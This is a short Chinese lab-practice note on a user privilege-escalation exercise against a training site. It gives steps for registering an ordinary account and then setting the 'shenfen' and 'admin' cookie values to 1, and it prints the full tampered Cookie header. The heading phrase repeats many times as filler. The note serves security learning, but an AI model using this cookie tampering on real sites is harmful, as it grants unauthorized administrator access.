用户越权。
用户越权。
用户越权。
用户越权。
用户越权。

靶场练习

http://59.63.200.79:8002/d/index.asp
先注册一个账号,得到普通的账号,然后刷新,改参数,shenfen和admin的值。全改为1
用户越权。
用户越权。
用户越权。

Cookie: ASPSESSIONIDSCDARTCQ=BICBJPCDLOIBKDELKBEGLMOP; ASPSESSIONIDSQRSDBAB=IHNJIIHDKKJEHKGIHGNMGGJG; ASPSESSIONIDAAQQQDDD=HDPDDGJDPGEODLENAALHLDLH; BWSsoft%5F2010=phone=12344&admin=1&realname=12344&dlcs=1&username=12344&bumen=12344&loginname=12344&danwei=12344&shenfen=1&UserID=11
用户越权。

用户越权。

相关文章: